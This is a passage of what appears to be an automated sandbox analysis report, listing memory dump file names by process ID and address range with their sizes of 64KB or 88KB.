memory/4920-338-0x000001DD1C470000-0x000001DD1C480000-memory.dmpFilesize
64KB
-
memory/4944-311-0x00007FF6E8D30000-0x00007FF6E8D46000-memory.dmpFilesize
88KB
-
memory/4944-294-0x00007FF6E8D30000-0x00007FF6E8D46000-memory.dmpFilesize
88KB
-
memory/5064-199-0x000001D665DE0000-0x000001D665DF0000-memory.dmpFilesize
64KB
-
memory/5064-206-0x000001D665DE0000-0x000001D665DF0000-memory.dmpFilesize
64KB
-
memory/5064-200-0x000001D665DE0000-0x000001D665DF0000-memory.dmpFilesize
64KB
-
memory/5068-188-0x000002E966BE0000-0x000002E966BF0000-memory.dmpFilesize
64KB
-
memory/5068-189-0x000002E966BE0000-0x000002E966BF0000-memory.dmpFilesize
64KB
-
memory/5068-190-0x000002E966BE0000-0x000002E966BF0000-memory.dmpFilesize
64KB